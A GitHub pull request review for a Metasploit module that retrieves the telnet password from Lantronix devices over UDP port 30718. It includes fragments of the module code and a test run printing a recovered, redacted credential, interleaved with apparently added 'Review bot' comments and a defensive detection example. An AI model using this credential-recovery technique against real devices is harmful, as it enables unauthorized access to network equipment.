
added Lantronix telnet password recovery module #906

Merged
merged 2 commits into from

2 participants

jgor Juan Vazquez
jgor

Description: This module retrieves the setup record from Lantronix serial-to-ethernet devices via the config port (30718/udp, enabled by default) and extracts the telnet password.

Lantronix device configuration is performed via telnet to port 9999, optionally protected by a 4-character password. Existing MSF module auxiliary/scanner/telnet/lantronix_telnet_version gets the version banner of this telnet service. This new module adds the ability to retrieve the credentials for the telnet service.

The code was modeled after modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb. It has been tested against a Lantronix CoBox-E2 device running the latest firmware (v5.8.0.1), reset to factory defaults and configured with a telnet password. It is based on PoC code of mine that I have successfully run against at least two additional Lantronix models, and theoretically will work on any device that uses the standard Lantronix discovery/config port (30718/udp) and supports accessing setup records through this port.

I can make a test device reachable if necessary. Let me know if more info is needed.

Juan Vazquez
Collaborator

Hi jgor,

First of all, thanks for your contribution. Access to a test device would be awesome to test the module. If you can't provide it, a pcap capture with the module in action would be necessary to verify that the module is working. Please feel free to contact me at juan.vazquez [at] metasploit.com in case you could provide access to a test device.

jgor

Test device connection details emailed.

...auxiliary/scanner/telnet/lantronix_telnet_password.rb
@@ -0,0 +1,111 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+###
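Review bot: the trailing `###` on the last line of this hunk opens a header comment block; keep it only if the block describes this module (the setup-record query over 30718/udp from the pull request description), since the template it was copied from describes a different sample module, as the thread below already notes.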
Juan Vazquez Collaborator

I think this comment L10-L15 can be deleted

jgor
jgor added a note

Yep, forgot to get rid of that from the sample module.

...auxiliary/scanner/telnet/lantronix_telnet_password.rb
((9 lines not shown))
+
+###
+#
+# This sample auxiliary module simply displays the selected action and
+# registers a custom command that will show up when the module is used.
+#
+###
+class Metasploit4 < Msf::Auxiliary
+ include Msf::Exploit::Remote::Udp
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'Lantronix Telnet Password Recovery',
+ 'Version' => '$Revision: 1 $',
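Review bot: the banner comment ("This sample auxiliary module simply displays the selected action and registers a custom command") describes the sample module rather than this one; replace it with a short description of what the module does (retrieve the Lantronix setup record via the config port and report the telnet password). The `'Version' => '$Revision: 1 $'` entry is an SVN keyword that git will never expand, so it can be dropped from the info hash.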
Juan Vazquez Collaborator

This was for svn purposes, can be deleted

Juan Vazquez jvazquez-r7 commented on the diff
...auxiliary/scanner/telnet/lantronix_telnet_password.rb
((77 lines not shown))
+ end
+
+ if password
+ print_good("#{rhost} - Telnet password found: #{password.to_s}")
+ report_auth_info({
+ :host => rhost,
+ :port => 9999,
+ :sname => 'telnet',
+ :duplicate_ok => false,
+ :pass => password,
+ })
+ end
+
+ end
+
+ def parse_reply(pkt)
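Review bot: `if password` only guards against nil, so an empty string returned by parse_reply would still be printed as a found password and stored via report_auth_info; consider `if password && !password.empty?`. In the same print_good call, `#{password.to_s}` is redundant because string interpolation already calls to_s. The report_auth_info hash gives :pass without :user, which is consistent with the password-only telnet setup login described in the pull request, but a one-line comment saying so would save the next reader a question.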
Juan Vazquez Collaborator

I don't fully understand the parse_reply function, why not just check whether it's a setup_record (it seems it is when setup_record[3] == 0xf9), and if it is a setup record, return the password?

Surely I'm forgetting things... really I can only test the setup response from the device made available by jgor (thanks :))

jgor
jgor added a note

The pkt[1] stuff (host info of the response from recvfrom()) is something I found in other existing modules, I assume it's a convention for trimming up ipv6 addresses. But now that I look at it again I don't use that value anyway, whoops...so it can all be removed. Thanks!
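A defender-side counterpart to the protocol summarised in the pull request description and the setup-record marker noted in this thread: an added example, not code from the pull request or from Metasploit, that classifies UDP datagrams touching the Lantronix config port (30718/udp) and flags setup-record replies delivered to hosts outside a management allow-list. It assumes a setup-record reply is recognised by byte 3 being 0xf9, as jvazquez-r7 observed; the sample datagrams and their payload bytes are constructed and are not the real wire format.

```ruby
# Added example (not part of the pull request): monitoring check for
# Lantronix config-port traffic. Assumption: byte 3 == 0xf9 marks a setup
# record reply, as noted in the review thread. Sample traffic is constructed.

LANTRONIX_CONFIG_PORT = 30718
SETUP_RECORD_MARKER   = 0xf9

# A datagram is a Hash: :src, :sport, :dst, :dport and :payload (binary String).
def classify_datagram(d)
  return :config_query if d[:dport] == LANTRONIX_CONFIG_PORT
  return :other unless d[:sport] == LANTRONIX_CONFIG_PORT

  bytes = d[:payload].to_s.bytes
  if bytes.length > 3 && bytes[3] == SETUP_RECORD_MARKER
    :setup_record_reply
  else
    :config_reply
  end
end

# One alert per setup record delivered to a host that is not on the
# management allow-list (the setup record carries the telnet password).
def find_setup_record_disclosures(datagrams, management_hosts)
  datagrams
    .select { |d| classify_datagram(d) == :setup_record_reply }
    .reject { |d| management_hosts.include?(d[:dst]) }
    .map { |d| "#{d[:src]} disclosed its setup record to #{d[:dst]}:#{d[:dport]}" }
end

# Constructed sample traffic: a query from the management host, a setup
# record reply to it, a setup record reply to an unexpected host on the
# user LAN, a non-setup reply, and unrelated traffic from another port.
SAMPLE_DATAGRAMS = [
  { src: '10.0.0.2',  sport: 40000, dst: '10.0.0.20', dport: 30718, payload: "\x00\x00\x00\x00".b },
  { src: '10.0.0.20', sport: 30718, dst: '10.0.0.2',  dport: 40000, payload: "\x00\x00\x00\xF9".b + ("\x00" * 120).b },
  { src: '10.0.0.20', sport: 30718, dst: '10.0.0.77', dport: 51234, payload: "\x00\x00\x00\xF9".b + ("\x00" * 120).b },
  { src: '10.0.0.20', sport: 30718, dst: '10.0.0.77', dport: 51235, payload: "\x00\x00\x00\x00".b },
  { src: '10.0.0.9',  sport: 53,    dst: '10.0.0.77', dport: 51236, payload: "\x00\x00\x00\xF9".b },
]

if __FILE__ == $0
  puts find_setup_record_disclosures(SAMPLE_DATAGRAMS, ['10.0.0.2'])
end
```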

Juan Vazquez
Collaborator

On the other hand I've tested it and the module is mainly working (thanks jgor!), awaiting jgor's update on the comments.

remsf  auxiliary(lantronix_telnet_password) > rexploit
[*] Reloading module...

[+] xx.xx.xx.xx - Telnet password found: xxxxxx
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(lantronix_telnet_password) > hosts

Hosts
=====

address         mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------         ---  ----  -------  ---------  -----  -------  ----  --------
xx.xx.xx.xx             Unknown                    device         

msf  auxiliary(lantronix_telnet_password) > creds

Credentials
===========

host            port  user  pass  type      active?
----            ----  ----  ----  ----      -------
xx.xx.xx.xx  9999        xxxxxx  password  true

jgor

Agreed on all fronts, 1) the sample module comment should be deleted, 2) the svn version line can go away, 3) all the pkt[1] code in parse_reply() should be deleted. I'm a bit new to this process, do I make the changes on my side and re-commit or do you need to make the changes? Thanks!

Juan Vazquez
Collaborator

You can do the changes by yourself, and when you're ready, from your local clone of your git repo, on the same branch you have used to open this pull request just do:

git commit -am "description for changes"
git push origin branch_name

And this pull request will be updated automatically :) Feel free to ask if you have any doubts about this. Hopefully soon we will all be github masters! :D

jgor

Done, thanks for the pointers!

Juan Vazquez jvazquez-r7 merged commit e22059d into from
Juan Vazquez
Collaborator

Awesome! merged :) really thanks jgor!

Commits on Oct 17, 2012
  1. jgor
  2. jgor
     Merge branch 'module-lantronix_telnet_password' of github.com:jgor/metasploit-framework into module-lantronix_telnet_password
     jgor authored